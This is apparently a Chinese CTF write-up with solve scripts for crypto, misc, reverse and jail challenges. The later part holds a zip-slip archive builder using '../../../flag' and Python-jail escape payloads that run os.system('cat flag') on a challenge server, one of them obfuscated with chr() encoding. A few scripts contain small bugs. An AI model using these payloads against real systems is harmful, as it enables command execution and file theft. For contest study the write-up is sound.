版权声明: 知识共享-版权归属-相同方式共享 3.0 授权协议 |
CC BY-SA 3.0 CN systemcall safe on
Crypto ez_math 二次剩余求解二次同余方程。网上抄的脚本。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 from Crypto.Util.number import *p = 10633422823586641149987674611498617713504538254098629772932594430746901821947698235981680825181906211362587494944457098739784046411665369071558829066081189 a = 1998864314689507283073620353498454561179240654344354244305436493079140699439237202376223842334895492652637067218967769472206166222936609139445293873354277 def convertToBase (n, b ): if (n < 2 ): return [n] temp = n ans = [] while (temp != 0 ): ans = [temp % b]+ ans temp //= b return ans def cipolla (n,p ): n %= p if (n == 0 or n == 1 ): return (n,-n%p) phi = p - 1 if (pow (n, phi//2 , p) != 1 ): return () if (p%4 == 3 ): ans = pow (n,(p+1 )//4 ,p) return (ans,-ans%p) aa = 0 for i in range (1 ,p): temp = pow ((i*i-n)%p,phi//2 ,p) if (temp == phi): aa = i break ; exponent = convertToBase((p+1 )//2 ,2 ) def cipollaMult (k,i,w,p ): (a,b) = k (c,d) = i return ((a*c+b*d*w)%p,(a*d+b*c)%p) x1 = (aa,1 ) x2 = cipollaMult(x1,x1,aa*aa-n,p) for i in range (1 ,len (exponent)): if (exponent[i] == 0 ): x2 = cipollaMult(x2,x1,aa*aa-n,p) x1 = cipollaMult(x1,x1,aa*aa-n,p) else : x1 = cipollaMult(x1,x2,aa*aa-n,p) x2 = cipollaMult(x2,x2,aa*aa-n,p) return (x1[0 ],-x1[0 ]%p) print ("Roots of a mod p: " +str (cipolla(a,p)))print (long_to_bytes(2983806571612194526961405572692022986638740339194067471831909775297069729649384214862874516129034255347837 ))print (long_to_bytes(10633422823586641149987674611498617713504538254095645966360982236219940416375006212995042084842712143890755585169160029010134662196802494555429794810733352 ))
ez_RSA 遍历平方根上/下所有质数即可。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 from Crypto.Util.number import *from gmpy2 import *from sympy import nextprimen = 4035549166201063668625831121705576874008436911538281208575794760645544423624387564688426536718178366478435676670979144680200696978227814830144542100395711 c = 3786139261372475668724096193769377329093814957990266807059048553543359924439586359037603467723438602328535634566311132223900311678610183892863679621498865 p = 63525972375092879554296019503424174440064543808584645254967172087718895967503 q = 63525972375092879554296019503424174440064543808584645254967172087718895782737 phi = (p - 1 ) * (q - 1 ) e = 65537 d = inverse(e, phi) print (long_to_bytes(pow (c, d, n)))
ez_stream 单纯的LCG
抄的网上的代码。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 from functools import reducefrom Crypto.Util.number import GCD, inverse, long_to_bytesdef crack_unknown_increment (states, modulus, multiplier ): increment = (states[1 ] - states[0 ]*multiplier) % modulus return modulus, multiplier, increment def crack_unknown_multiplier (states, modulus ): multiplier = (states[2 ] - states[1 ]) * inverse(states[1 ] - states[0 ], modulus) % modulus return crack_unknown_increment(states, modulus, multiplier) def crack_unknown_modulus (states ): diffs = [s1 - s0 for s0, s1 in zip (states, states[1 :])] zeroes = [t2*t0 - t1*t1 for t0, t1, t2 in zip (diffs, diffs[1 :], diffs[2 :])] modulus = abs (reduce(GCD, zeroes)) return crack_unknown_multiplier(states, modulus) streams = [9495827047149859431006132233092319600974497202909253926749062926629593244068453225049157210427035578610572648934127458697875459018625442857002141732217770 , 10115020037566558567950233730614138895861258911796641397386881027127960456781622215464273323776545118396888793579040620180155181472925379479313621734027106 , 7981464236725021226761002919675861665400231148613997426185256093560877035104768633006706451402090228382477159223882030737510433675925204999566093494578649 , 7234746427175795537750797360089344216037062205426141685667019106513326156971404038531885341019184616074232937324413429612387506532206135481520255585379406 , 1357271691014350448396348499212607078815784207280436403590895273573976719039929574669406267302326522264476319971818333746270219399739509954488350206939098 , 7793179134619447746786204535466843534146448146433627831440211439100356628823998206285679114995319552700902657159016155894261217929142592869048023480586212 , 4200327504806355753051034681672501621139445844167069726269562915330857270053067365147343903654640822017169864193359688974572363544448011864141566263095749 , 108628953170107941851019292289726767457637648818478130784905137964469415279928037910613035615390728484479166491155355807849114853079424541224944189539847 , 5705546688186793363975386254231457567617039881042153075212145501441367909435598304220032988441701636156883589472050191697468859533156776122580445917630325 , 7981888661925380274343353230517871440910482184881452246559514192102636787698437211797463663103264392789656523953870523387090188318571331660341390462731390 , 7457245978258721215462104387713889824053460895409859984119211875448230853693133504670379095111834060476305868684456810408551054941569397242555875768832649 , 4713653327629167917403933577518371673458093664892888492572355124165551105119901889718017605151941173424260920921889047705106706830968478068151992223522578 , 2778597751579300390231070107111625883828070769573760110725311512998545986829373825533426150065870859785603212189825907356142828522955158081072354492809680 , 9425692327305131597174516996805078131281224792942807687405090540733107737207289300618346774901368434264552235754283457515007094594155397130150749105141065 , 9556791103080784553100760363166943075547406777892268608148510940860093314305835822848257344853594949658922763296325860053473764167311744969251511348213287 , 3896599182642428007339381753538662783145048962607822890502362802858865113464050570340177651462017198029133580814296850288701444407514341373723669684607404 , 5301032047745045360653610644813773116678094274772865081138467683002390318886475845448249954952652462684815881485467937894005492015515126563397015290271507 , 10868560876138340913503045822008353068681490521878057747798994346359112617020680300987213799662349291611409047377282385725263726186142570966125699633074711 , 7224059293852369017807048556361213684202031860793036930767704651075967932687581020962849350943008127181892942681851425187555531885333162641401020598706109 , 7226506847869420283438523642497968822001335509181374339634589228508210118084622247062696000754665385287906355641339893928516640360280080695911187254582014 , 4490720948265923860968128277045129252750568336235325441630922401592392266045933527280025412489344475057552346462497460984868092646213341802194388892641162 , 12239413304325398135459519900658880538898158568425938945987878203058591924624777413114550809099368944806146909046355605791667787917390610337772668459482241 , 12031682149667615392071800744401356969359813602233530042569742700015933405128350539724007232636961842858808427912797934459072652111927403074732121115504628 , 4221093662830924228203427096071485647982605270125869903377211974849182525446297391581648132634312810831050522760260275007179715712643712807112993795753997 , 2482697446655927304158367339258791596351991275787745319752390116410069174704817051381264029708263048001624482866674356617492861541235444301461140118393072 , 8640022216821216730690651815111823956880449322964650463439245341042028148002067020497662105357100062992076913929538672631319194491404650014998985176729399 , 2359340306264030427013371066451754161105421482248597639896728896779325719717468031430724904579038543182751480657717151072505664496249601885013517511335354 , 9564043228397984061879998221762974239257692421128455446103840572377581806608193811671996975444148075468746455929973308146521294633753660232825656123106269 , 2907481445175213163867320739818049791618436439840769557448890646035507771955530568981806701569558507904871970470593181264954913164043063396749090598187913 , 10918758557560698694046891429167354585108582071006014989054758320395366657576667871567836659358610198829544520915724060818132910952992777240463509701288475 ] modulus, multiplier, increment = (crack_unknown_modulus(streams)) flag = (streams[0 ] - increment) * inverse(multiplier, modules) % modulus print (long_to_bytes(flag))
medium_math 中国剩余定理。爆破模数。检查是否全部printable
脚本网上抄的,
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 ps = [659393664465323 , 906528195345220 , 975250387802548 , 969115381470588 , 111169318220929 , 1000427453556060 , 954439163305195 ] ans = [501927404661911 , 766711039999273 , 177155835710273 , 288656999508165 , 71725206442480 , 876880066906893 , 315100179694493 ] import hashlibfrom functools import reducefrom gmpy2 import gcdfrom Crypto.Util.number import *from string import printableNum = 7 m = ps a = ans def egcd (a, b ): if a == 0 : return (b, 0 , 1 ) else : g, y, x = egcd(b % a, a) return (g, x - (b // a) * y, y) def china (num ): m1,a1,lcm=m[0 ],a[0 ],m[0 ] for i in range (1 ,num): m2=m[i] a2=a[i] c=a2-a1 g,k1,k2=egcd(m1,m2) lcm=lcm*m[i]//gcd(lcm,m[i]) if c%g : print ('No Answer!' ) return 0 x0=c//g*k1 t=m2//g x0=(x0%t+t)%t a1+=m1*x0 m1=m2//g*m1 return a1, lcm ans, lcm=china(Num) print (ans, lcm)while ans.bit_length() < 355 : ans += lcm fl = 1 for i in long_to_bytes(ans): if not chr (i) in printable: fl = 0 break if fl == 1 : print (long_to_bytes(ans))
medium_RSA 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 from Crypto.Util.number import bytes_to_long, getPrimefrom random import getrandbitsfrom secret import flagm = bytes_to_long(flag) e = 0x10001 Bit = 512 num = 10 p = getPrime(Bit) q = getPrime(Bit) n = p*q c = pow (m, e, n) A = 2 *p + getrandbits(10 ) for _ in range (num): A *= (2 *p + getrandbits(10 )) print (n)print (c)print (A)
以下是exp
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 from gmpy2 import *from sympy import *from Crypto.Util.number import *num = 10 n = 126196923548625847007509156347769080356376807913358557231519237312422894719992338122246906927571014363916235486350310619563446000628702895891082078748068898399936770847800373026521881812370892139078625210278038341538895090439439843721400025947799897996722863432196226002591888931076933845502045941034749623889 c = 48201959815948321069565015662369943530388516625817550173984537684351272970057989376745749566504500383464507283699368534431332408061844153810636139094917238717421462765300639466242642361876185462443217118831736122706041007461320278170789677013641147605940832111874004776737382832737196779409084954438407127011 A = 635934922309055346133415678269698199759490946234253833414253522553283272521060237449330426878003238912309435024068834396107372320259122074959821922464016026569414146021226442896779730636129394313561087201211651897950138688482133353661884411272507838709344334674531685634247113077934870272463361844892145071231021375133594833632472876791648928626128037746641134480657927752695915345595036776971241257194429152473981570364935705304277053716095216265421853780155769033948892452930151216430983647179249168734308893517566620154442957585863110396358124440290667924012506125143006540451142042725611304829190947070296445962248992247787841311031371268925390245408945912685748053207863129569867935801356348840599681888158594922158857172284310611049606108621278846671375426752166943393136418632612473660552417600841557325266291241737036905449764635450581946496507308594218664500703837952466913617756023014717848436311977327781535355324353792039454042875230110617849576103379701892004917825581624772973169692549574252635296349080277276065341212380685231056993029811446518719799836853983138472053707659466665588336144567634073841407944750164301198933200128164294274125315737522109663725147569611022328892925518465495894355051512453795770592786125186631096793484922508032204114685327011130039081705937794968288418830498961017825920200116163134892907377383917068266857623939536637180017143935785568839086382108681164164045312727919908487558782010971051238407024505074658143919809174159493529587704704051028722305969193612028336083581711925255316496645056860103677961551431366746571804954569824501050909282628587517428323804928290882141395773404213425707798529483770890342295741666220344683595646791564252065280000 p = 11084976913707120845676997473476120049925696537758139093110720348331501885877388177868038354130254514285517993448105804093297456650430613525974991412673613 q = n // p phi = (p - 1 ) * (q - 1 ) e = 65537 d = inverse(e, phi) print (long_to_bytes(pow (c, d, n)))
medium_stream 秘钥复用。
1 2 3 4 5 6 7 8 9 10 11 12 from pwn import xorfrom Crypto.Util.number import *flag_k = 0x17cd2b76cea2303805f63a5dd38c0652f542d796d316dfcbc1ca5d0514f6096bb4f41fd2d2f45de0114a2b7d known = 0x37e64f5efb8f3e7b7ba12f0d8fd84508a6129fc19051c1ddcb821f4242b6507be1e758c686a108f2455a3c7d knwon_p = bytes_to_long(b'sh1kaku{Of all weapons,the past cut deepest}' ) lens = len (long_to_bytes(flag_k)) print (long_to_bytes(flag_k ^ known ^ knwon_p))
ez_copper 考虑类似Factor with high bits known的做法
把多项式F(x) 变成 ,首一化后coppersmith即可。
然后就是基础的RSA
medium_copper 先通过dp泄露的原理推式子,得到 ,可以得知
考虑在模 的意义下解方程,即 ,解出来后为 的可能值,然后就是ez_copper
hard_math 考虑flag的前7位是一定的,枚举模数p,求出p的原根后可以列出以 七个变量的七个方程,解出方程验证后还原flag即可
Misc LSB but base64 先用stegesolve查看LSB发现均为乱码 根据提示:b64encode得知要base64加密先将16进制数字转变回byte再base64加密
1 2 3 4 5 from base64 import *from Crypto.Util.number import *a=0x7E56A0FA2B3E5B795CD267BEEE8FB972E72D7FEE2777E9B5B1CFA2E7EBF7AF2F9FBA79F2 byte = long_to_bytes(a) b64encode(byte)
得到结果
豪豪的晚餐 图片中有烤匠两个字确定店子是烤匠 exif查看有经纬度,谷歌地图定位后找一个标志后输入到百度地图中点周边,美食,看最近的一家烤匠再去美团核实店名即可。 小宇的通勤 向上的指示牌是地铁2号和8号线,发现是同一种颜色,上网搜地铁线路标识色发现只有深圳地铁2号和8号是同一条,再看下面的地铁是黄色的确定是14号线,看交汇点既是结果:岗厦北。
豪豪扫描器 notepad++直接搜scu得到答案
Chicken 010editor打开最底下发现一串base64解码即使答案
后来 解的时候走了很多弯路,识图都识别不出来,试了很多办法都没用,搜索结果中也没有想要的,最后在浏览一个网址的时候发现和图中白色柱子长得一样的柱子。
[medium]unzip 1 2 3 4 5 6 7 8 9 10 from zipfile import *from base64 import *zipf = ZipFile("Uploads.zip" , "w" ) source_file = "flag" zipf.write(source_file, "../../../flag" ) zipf.close() fi = open ("Uploads.zip" , "rb" ) base64d = b64encode(fi.read()) print (base64d.decode("ascii" ))
上传该文件,然后再 2
查看解压后的文件地址,读出 /flag
。
[easy]learning_python 1 2 3 4 5 6 7 from pwn import *context(log_level = "debug" ) sh = remote("114.117.187.56" , 8901 ) sh.recv() payload = '__import__("os").system("cd .. ; cd .. ; cat flag")' sh.sendline(payload.encode()) sh.recv()
[medium]learning python2 1 2 3 4 5 6 7 8 9 10 11 12 from pwn import *context(log_level = "debug" ) sh = remote("114.117.187.56" , 8902 ) sh.recv() payload = '__import__("os").system("cd .. ; cd .. ; cat flag")' payloads = "eval(" for i in payload: payloads += ("chr(" + str (ord (i)) + ")" + "+" ) payloads = payloads[0 :-1 ] + ")" print (payloads)sh.sendline(payloads.encode()) sh.recv()
learning python3 没有好好验题是这样的。
预期解可能是用 __subclasses__
之类的花活。
1 2 3 4 5 6 7 from pwn import *context(log_level = "debug" ) sh = remote("114.117.187.56" , 8903 ) sh.recv() payload = 'print(open("/flag", "r").read())' sh.sendline(payload.encode()) sh.recv()
Reverse ez_pyc 反编译。一眼z3-solver
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 from z3 import *flag = [BitVec("%d" % i, 8 ) for i in range (25 )] s = Solver() s.add(99 * flag[0 ] + 91 * flag[1 ] + 69 * flag[2 ] + 42 * flag[3 ] + 65 * flag[4 ] + 86 * flag[5 ] + 63 * flag[6 ] + 9 * flag[7 ] + 60 * flag[8 ] + 82 * flag[9 ] + 61 * flag[10 ] + 65 * flag[11 ] + 14 * flag[12 ] + 86 * flag[13 ] + 2 * flag[14 ] + 53 * flag[15 ] + 56 * flag[16 ] + 17 * flag[17 ] + 88 * flag[18 ] + 20 * flag[19 ] + 6 * flag[20 ] + 21 * flag[21 ] + 100 * flag[22 ] + 24 * flag[23 ] + 11 * flag[24 ] == 133017 ) s.add(99 * flag[0 ] + 2 * flag[1 ] + 14 * flag[2 ] + 30 * flag[3 ] + 38 * flag[4 ] + 23 * flag[5 ] + 6 * flag[6 ] + 100 * flag[7 ] + 43 * flag[8 ] + 58 * flag[9 ] + 82 * flag[10 ] + 20 * flag[11 ] + 19 * flag[12 ] + 39 * flag[13 ] + 16 * flag[14 ] + 1 * flag[15 ] + 15 * flag[16 ] + 82 * flag[17 ] + 97 * flag[18 ] + 47 * flag[19 ] + 28 * flag[20 ] + 51 * flag[21 ] + 96 * flag[22 ] + 54 * flag[23 ] + 43 * flag[24 ] == 113856 ) s.add(63 * flag[0 ] + 86 * flag[1 ] + 33 * flag[2 ] + 39 * flag[3 ] + 45 * flag[4 ] + 76 * flag[5 ] + 37 * flag[6 ] + 64 * flag[7 ] + 65 * flag[8 ] + 56 * flag[9 ] + 32 * flag[10 ] + 69 * flag[11 ] + 38 * flag[12 ] + 1 * flag[13 ] + 20 * flag[14 ] + 44 * flag[15 ] + 16 * flag[16 ] + 78 * flag[17 ] + 12 * flag[18 ] + 97 * flag[19 ] + 29 * flag[20 ] + 46 * flag[21 ] + 54 * flag[22 ] + 81 * flag[23 ] + 47 * flag[24 ] == 126193 ) s.add(9 * flag[0 ] + 100 * flag[1 ] + 1 * flag[2 ] + 5 * flag[3 ] + 99 * flag[4 ] + 20 * flag[5 ] + 37 * flag[6 ] + 91 * flag[7 ] + 53 * flag[8 ] + 85 * flag[9 ] + 52 * flag[10 ] + 49 * flag[11 ] + 69 * flag[12 ] + 32 * flag[13 ] + 7 * flag[14 ] + 81 * flag[15 ] + 80 * flag[16 ] + 89 * flag[17 ] + 87 * flag[18 ] + 24 * flag[19 ] + 90 * flag[20 ] + 54 * flag[21 ] + 16 * flag[22 ] + 6 * flag[23 ] + 2 * flag[24 ] == 128397 ) s.add(72 * flag[0 ] + 18 * flag[1 ] + 71 * flag[2 ] + 28 * flag[3 ] + 67 * flag[4 ] + 25 * flag[5 ] + 26 * flag[6 ] + 59 * flag[7 ] + 96 * flag[8 ] + 30 * flag[9 ] + 65 * flag[10 ] + 39 * flag[11 ] + 29 * flag[12 ] + 35 * flag[13 ] + 95 * flag[14 ] + 55 * flag[15 ] + 67 * flag[16 ] + 63 * flag[17 ] + 72 * flag[18 ] + 61 * flag[19 ] + 30 * flag[20 ] + 74 * flag[21 ] + 38 * flag[22 ] + 61 * flag[23 ] + 58 * flag[24 ] == 138932 ) s.add(30 * flag[0 ] + 69 * flag[1 ] + 52 * flag[2 ] + 68 * flag[3 ] + 94 * flag[4 ] + 37 * flag[5 ] + 13 * flag[6 ] + 85 * flag[7 ] + 97 * flag[8 ] + 66 * flag[9 ] + 57 * flag[10 ] + 40 * flag[11 ] + 11 * flag[12 ] + 93 * flag[13 ] + 87 * flag[14 ] + 22 * flag[15 ] + 61 * flag[16 ] + 3 * flag[17 ] + 17 * flag[18 ] + 54 * flag[19 ] + 22 * flag[20 ] + 18 * flag[21 ] + 57 * flag[22 ] + 58 * flag[23 ] + 88 * flag[24 ] == 136211 ) s.add(81 * flag[0 ] + 62 * flag[1 ] + 83 * flag[2 ] + 60 * flag[3 ] + 71 * flag[4 ] + 64 * flag[5 ] + 96 * flag[6 ] + 88 * flag[7 ] + 96 * flag[8 ] + 39 * flag[9 ] + 23 * flag[10 ] + 77 * flag[11 ] + 85 * flag[12 ] + 87 * flag[13 ] + 3 * flag[14 ] + 3 * flag[15 ] + 56 * flag[16 ] + 67 * flag[17 ] + 59 * flag[18 ] + 11 * flag[19 ] + 32 * flag[20 ] + 41 * flag[21 ] + 1 * flag[22 ] + 71 * flag[23 ] + 10 * flag[24 ] == 141572 ) s.add(95 * flag[0 ] + 66 * flag[1 ] + 37 * flag[2 ] + 55 * flag[3 ] + 2 * flag[4 ] + 29 * flag[5 ] + 65 * flag[6 ] + 85 * flag[7 ] + 68 * flag[8 ] + 95 * flag[9 ] + 77 * flag[10 ] + 16 * flag[11 ] + 2 * flag[12 ] + 94 * flag[13 ] + 54 * flag[14 ] + 92 * flag[15 ] + 44 * flag[16 ] + 48 * flag[17 ] + 70 * flag[18 ] + 25 * flag[19 ] + 57 * flag[20 ] + 48 * flag[21 ] + 74 * flag[22 ] + 63 * flag[23 ] + 49 * flag[24 ] == 143300 ) s.add(79 * flag[0 ] + 85 * flag[1 ] + 53 * flag[2 ] + 93 * flag[3 ] + 69 * flag[4 ] + 33 * flag[5 ] + 63 * flag[6 ] + 2 * flag[7 ] + 93 * flag[8 ] + 82 * flag[9 ] + 73 * flag[10 ] + 37 * flag[11 ] + 91 * flag[12 ] + 13 * flag[13 ] + 1 * flag[14 ] + 62 * flag[15 ] + 60 * flag[16 ] + 17 * flag[17 ] + 7 * flag[18 ] + 95 * flag[19 ] + 65 * flag[20 ] + 91 * flag[21 ] + 14 * flag[22 ] + 64 * flag[23 ] + 66 * flag[24 ] == 146502 ) s.add(33 * flag[0 ] + 57 * flag[1 ] + 13 * flag[2 ] + 85 * flag[3 ] + 83 * flag[4 ] + 31 * flag[5 ] + 73 * flag[6 ] + 41 * flag[7 ] + 19 * flag[8 ] + 41 * flag[9 ] + 80 * flag[10 ] + 33 * flag[11 ] + 5 * flag[12 ] + 42 * flag[13 ] + 3 * flag[14 ] + 27 * flag[15 ] + 1 * flag[16 ] + 55 * flag[17 ] + 24 * flag[18 ] + 72 * flag[19 ] + 21 * flag[20 ] + 98 * flag[21 ] + 89 * flag[22 ] + 58 * flag[23 ] + 41 * flag[24 ] == 118533 ) s.add(29 * flag[0 ] + 5 * flag[1 ] + 52 * flag[2 ] + 22 * flag[3 ] + 21 * flag[4 ] + 8 * flag[5 ] + 41 * flag[6 ] + 10 * flag[7 ] + 51 * flag[8 ] + 69 * flag[9 ] + 90 * flag[10 ] + 63 * flag[11 ] + 90 * flag[12 ] + 24 * flag[13 ] + 91 * flag[14 ] + 99 * flag[15 ] + 40 * flag[16 ] + 6 * flag[17 ] + 17 * flag[18 ] + 81 * flag[19 ] + 47 * flag[20 ] + 100 * flag[21 ] + 99 * flag[22 ] + 3 * flag[23 ] + 46 * flag[24 ] == 124392 ) s.add(59 * flag[0 ] + 64 * flag[1 ] + 99 * flag[2 ] + 26 * flag[3 ] + 76 * flag[4 ] + 42 * flag[5 ] + 37 * flag[6 ] + 62 * flag[7 ] + 14 * flag[8 ] + 15 * flag[9 ] + 15 * flag[10 ] + 49 * flag[11 ] + 10 * flag[12 ] + 88 * flag[13 ] + 5 * flag[14 ] + 3 * flag[15 ] + 52 * flag[16 ] + 70 * flag[17 ] + 89 * flag[18 ] + 37 * flag[19 ] + 98 * flag[20 ] + 1 * flag[21 ] + 18 * flag[22 ] + 75 * flag[23 ] + 13 * flag[24 ] == 118223 ) s.add(66 * flag[0 ] + 65 * flag[1 ] + 5 * flag[2 ] + 80 * flag[3 ] + 42 * flag[4 ] + 93 * flag[5 ] + 42 * flag[6 ] + 15 * flag[7 ] + 1 * flag[8 ] + 90 * flag[9 ] + 4 * flag[10 ] + 14 * flag[11 ] + 97 * flag[12 ] + 25 * flag[13 ] + 68 * flag[14 ] + 93 * flag[15 ] + 78 * flag[16 ] + 33 * flag[17 ] + 33 * flag[18 ] + 70 * flag[19 ] + 21 * flag[20 ] + 10 * flag[21 ] + 25 * flag[22 ] + 92 * flag[23 ] + 43 * flag[24 ] == 122643 ) s.add(25 * flag[0 ] + 95 * flag[1 ] + 15 * flag[2 ] + 82 * flag[3 ] + 82 * flag[4 ] + 99 * flag[5 ] + 9 * flag[6 ] + 60 * flag[7 ] + 74 * flag[8 ] + 8 * flag[9 ] + 82 * flag[10 ] + 99 * flag[11 ] + 79 * flag[12 ] + 83 * flag[13 ] + 8 * flag[14 ] + 42 * flag[15 ] + 41 * flag[16 ] + 75 * flag[17 ] + 93 * flag[18 ] + 75 * flag[19 ] + 36 * flag[20 ] + 57 * flag[21 ] + 84 * flag[22 ] + 99 * flag[23 ] + 67 * flag[24 ] == 166882 ) s.add(26 * flag[0 ] + 14 * flag[1 ] + 83 * flag[2 ] + 22 * flag[3 ] + 62 * flag[4 ] + 50 * flag[5 ] + 68 * flag[6 ] + 95 * flag[7 ] + 27 * flag[8 ] + 99 * flag[9 ] + 29 * flag[10 ] + 31 * flag[11 ] + 12 * flag[12 ] + 37 * flag[13 ] + 18 * flag[14 ] + 51 * flag[15 ] + 36 * flag[16 ] + 72 * flag[17 ] + 98 * flag[18 ] + 96 * flag[19 ] + 25 * flag[20 ] + 49 * flag[21 ] + 6 * flag[22 ] + 59 * flag[23 ] + 2 * flag[24 ] == 120884 ) s.add(15 * flag[0 ] + 51 * flag[1 ] + 6 * flag[2 ] + 80 * flag[3 ] + 72 * flag[4 ] + 49 * flag[5 ] + 13 * flag[6 ] + 28 * flag[7 ] + 57 * flag[8 ] + 1 * flag[9 ] + 43 * flag[10 ] + 82 * flag[11 ] + 36 * flag[12 ] + 36 * flag[13 ] + 55 * flag[14 ] + 2 * flag[15 ] + 96 * flag[16 ] + 29 * flag[17 ] + 2 * flag[18 ] + 82 * flag[19 ] + 60 * flag[20 ] + 65 * flag[21 ] + 100 * flag[22 ] + 37 * flag[23 ] + 12 * flag[24 ] == 118151 ) s.add(32 * flag[0 ] + 44 * flag[1 ] + 6 * flag[2 ] + 70 * flag[3 ] + 17 * flag[4 ] + 49 * flag[5 ] + 66 * flag[6 ] + 51 * flag[7 ] + 29 * flag[8 ] + 13 * flag[9 ] + 38 * flag[10 ] + 26 * flag[11 ] + 27 * flag[12 ] + 18 * flag[13 ] + 73 * flag[14 ] + 1 * flag[15 ] + 67 * flag[16 ] + 45 * flag[17 ] + 10 * flag[18 ] + 49 * flag[19 ] + 63 * flag[20 ] + 9 * flag[21 ] + 75 * flag[22 ] + 46 * flag[23 ] + 88 * flag[24 ] == 105637 ) s.add(39 * flag[0 ] + 90 * flag[1 ] + 54 * flag[2 ] + 62 * flag[3 ] + 25 * flag[4 ] + 97 * flag[5 ] + 53 * flag[6 ] + 92 * flag[7 ] + 90 * flag[8 ] + 34 * flag[9 ] + 53 * flag[10 ] + 91 * flag[11 ] + 84 * flag[12 ] + 78 * flag[13 ] + 88 * flag[14 ] + 8 * flag[15 ] + 88 * flag[16 ] + 24 * flag[17 ] + 86 * flag[18 ] + 33 * flag[19 ] + 98 * flag[20 ] + 46 * flag[21 ] + 69 * flag[22 ] + 80 * flag[23 ] + 47 * flag[24 ] == 168627 ) s.add(1 * flag[0 ] + 50 * flag[1 ] + 59 * flag[2 ] + 85 * flag[3 ] + 14 * flag[4 ] + 89 * flag[5 ] + 12 * flag[6 ] + 64 * flag[7 ] + 1 * flag[8 ] + 49 * flag[9 ] + 97 * flag[10 ] + 8 * flag[11 ] + 11 * flag[12 ] + 59 * flag[13 ] + 40 * flag[14 ] + 13 * flag[15 ] + 73 * flag[16 ] + 82 * flag[17 ] + 98 * flag[18 ] + 50 * flag[19 ] + 43 * flag[20 ] + 70 * flag[21 ] + 93 * flag[22 ] + 5 * flag[23 ] + 7 * flag[24 ] == 123563 ) s.add(83 * flag[0 ] + 41 * flag[1 ] + 15 * flag[2 ] + 86 * flag[3 ] + 1 * flag[4 ] + 18 * flag[5 ] + 7 * flag[6 ] + 93 * flag[7 ] + 72 * flag[8 ] + 49 * flag[9 ] + 48 * flag[10 ] + 26 * flag[11 ] + 83 * flag[12 ] + 70 * flag[13 ] + 18 * flag[14 ] + 28 * flag[15 ] + 32 * flag[16 ] + 77 * flag[17 ] + 81 * flag[18 ] + 5 * flag[19 ] + 61 * flag[20 ] + 8 * flag[21 ] + 98 * flag[22 ] + 94 * flag[23 ] + 22 * flag[24 ] == 125124 ) s.add(40 * flag[0 ] + 63 * flag[1 ] + 90 * flag[2 ] + 28 * flag[3 ] + 52 * flag[4 ] + 79 * flag[5 ] + 21 * flag[6 ] + 77 * flag[7 ] + 86 * flag[8 ] + 91 * flag[9 ] + 50 * flag[10 ] + 95 * flag[11 ] + 82 * flag[12 ] + 30 * flag[13 ] + 60 * flag[14 ] + 2 * flag[15 ] + 97 * flag[16 ] + 33 * flag[17 ] + 11 * flag[18 ] + 30 * flag[19 ] + 64 * flag[20 ] + 40 * flag[21 ] + 4 * flag[22 ] + 2 * flag[23 ] + 1 * flag[24 ] == 126844 ) s.add(61 * flag[0 ] + 9 * flag[1 ] + 36 * flag[2 ] + 17 * flag[3 ] + 13 * flag[4 ] + 53 * flag[5 ] + 96 * flag[6 ] + 41 * flag[7 ] + 28 * flag[8 ] + 63 * flag[9 ] + 20 * flag[10 ] + 4 * flag[11 ] + 71 * flag[12 ] + 99 * flag[13 ] + 37 * flag[14 ] + 2 * flag[15 ] + 58 * flag[16 ] + 38 * flag[17 ] + 75 * flag[18 ] + 29 * flag[19 ] + 34 * flag[20 ] + 66 * flag[21 ] + 82 * flag[22 ] + 39 * flag[23 ] + 50 * flag[24 ] == 116479 ) s.add(51 * flag[0 ] + 56 * flag[1 ] + 13 * flag[2 ] + 6 * flag[3 ] + 80 * flag[4 ] + 8 * flag[5 ] + 99 * flag[6 ] + 76 * flag[7 ] + 14 * flag[8 ] + 32 * flag[9 ] + 99 * flag[10 ] + 7 * flag[11 ] + 27 * flag[12 ] + 32 * flag[13 ] + 20 * flag[14 ] + 23 * flag[15 ] + 79 * flag[16 ] + 89 * flag[17 ] + 54 * flag[18 ] + 78 * flag[19 ] + 23 * flag[20 ] + 89 * flag[21 ] + 96 * flag[22 ] + 85 * flag[23 ] + 94 * flag[24 ] == 139277 ) s.add(3 * flag[0 ] + 17 * flag[1 ] + 78 * flag[2 ] + 6 * flag[3 ] + 75 * flag[4 ] + 18 * flag[5 ] + 29 * flag[6 ] + 1 * flag[7 ] + 49 * flag[8 ] + 8 * flag[9 ] + 90 * flag[10 ] + 60 * flag[11 ] + 62 * flag[12 ] + 13 * flag[13 ] + 16 * flag[14 ] + 87 * flag[15 ] + 38 * flag[16 ] + 71 * flag[17 ] + 39 * flag[18 ] + 12 * flag[19 ] + 47 * flag[20 ] + 7 * flag[21 ] + 54 * flag[22 ] + 83 * flag[23 ] + 64 * flag[24 ] == 109760 ) s.add(58 * flag[0 ] + 1 * flag[1 ] + 51 * flag[2 ] + 94 * flag[3 ] + 69 * flag[4 ] + 86 * flag[5 ] + 45 * flag[6 ] + 14 * flag[7 ] + 23 * flag[8 ] + 4 * flag[9 ] + 25 * flag[10 ] + 9 * flag[11 ] + 72 * flag[12 ] + 85 * flag[13 ] + 35 * flag[14 ] + 39 * flag[15 ] + 92 * flag[16 ] + 43 * flag[17 ] + 19 * flag[18 ] + 26 * flag[19 ] + 76 * flag[20 ] + 55 * flag[21 ] + 52 * flag[22 ] + 59 * flag[23 ] + 24 * flag[24 ] == 121674 ) a = s.check() print (a)result = s.model() print (result)for i in range (26 ): print (chr (result[i]), end = "" )
Tower of Hanoi Upx脱壳一下,ida反编译,
异或回去即可
DEBUG Ida反编译后发现代码为对一个字符串30次随机两个位置交换,gdb看一下随机数
Gdb发现进去后会RE,patch掉即可
